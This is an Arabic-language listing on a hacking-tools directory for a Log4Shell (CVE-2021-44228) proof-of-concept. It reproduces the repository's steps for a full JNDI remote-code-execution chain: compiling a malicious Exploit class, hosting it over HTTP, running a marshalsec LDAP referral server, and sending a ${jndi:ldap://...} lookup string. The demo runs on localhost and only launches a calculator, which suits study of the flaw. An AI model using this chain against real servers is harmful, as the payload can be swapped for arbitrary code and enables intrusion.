Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44228-Log4Shell-POC — إثبات المفهوم لثغرة Log4Shell (CVE-2021-44228) الذي يوضح تنفيذ التعليمات البرمجية عن بُعد القائم على JNDI عبر خوادم LDAP وHTTP. | Kitploit
أدوات/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

إثبات المفهوم لثغرة Log4Shell (CVE-2021-44228) الذي يوضح تنفيذ التعليمات البرمجية عن بُعد القائم على JNDI عبر خوادم LDAP وHTTP.

عرض المستودع
213منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44228-Log4Shell-POC

POC كامل لثغرة Log4j الشهيرة CVE-2021-44228

المتطلبات الأساسية

  • قم بتنزيل وتثبيت Java من هنا، يمكنك استخدام jdk-8u181.
  • قم بتثبيت IntelliJ Idea من هنا

POC

  • الخطوة 1 : استنساخ هذا المستودع.
  • الخطوة 2 : انقل ملف Exploit.java إلى مجلد مختلف. كما في حالتي، قمت بإنشاء مجلد rce داخل الدليل الرئيسي. /home/coldfusionx/rce

mov

  • الخطوة 3 : إلقاء نظرة على Exploit.java هنا يمكنك تغيير الكود البعيد إلى أي شيء، في هذه الحالة سيظهر على جهاز ubuntu.
gnome-calculator

exp

  • الخطوة 4 : بعد ذلك نحتاج إلى تجميع Exploit.java باستخدام الأمر javac Exploit.java، وبمجرد نجاح التجميع يجب أن نرى ملفًا جديدًا باسم Exploit.class يتم إنشاؤه.

com

  • الخطوة 5 : قم بتشغيل خادم http بلغة python لاستضافة Exploit.class باستخدام python3 -m http.server 8888، وبدلاً من ذلك يمكنك أيضًا استخدام خادم php باستخدام الأمر php -S 127.0.0.1:8888.

sv

  • الخطوة 6 : قم بتحميل ملفات المشروع إلى IntelliJ Idea واترك maven يكمل فهرسة الملفات. بمجرد الانتهاء، يجب أن يبدو مشروعك هكذا :

poc1

  • الخطوة 7 : لتشغيل المشروع، نحتاج إلى إنشاء إعداد، انقر على Add Configuration

poc2

root@kitploit:~
1. حدد `Application`

poc3

root@kitploit:~
2. حدد الفئة الرئيسية

main

root@kitploit:~
3. حدد JDK ثم اضغط apply.

poc4

root@kitploit:~
4. يجب أن ترى Log4j Applicaton تم إنشاؤها وجاهزة للتشغيل.

poc5

  • الخطوة 8 : بعد ذلك نقوم بتشغيل LDAPRefServer باستخدام marshalsec :
  • cd marshasec
  • قم بتشغيل java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" لبدء خادم LDAP، هنا 127.0.0.1:8888 هو الخادم python الذي يستضيف Exploit.class لذلك نحدد /#Exploit

ldap

  • الخطوة 9 : قم بتعديل حمولة JNDI في log4j.java وفقًا لمتطلباتك، logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); في هذه الحالة نقوم بتحميل الفئة البعيدة Exploit، وسيقوم خادم إحالة LDAP بإعادة توجيه الطلب إلى خادم python الخاص بنا الذي يستضيف فئة Exploit الخبيثة.

  • الخطوة 10 : قم بتشغيل Log4j، عند التشغيل الناجح يجب أن ترى حاسبة gnome تظهر.

rce

اطلع على تحليلي المفصل حول Log4Shell CVE-2021-44228

مرجع

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
تنزيل الأداة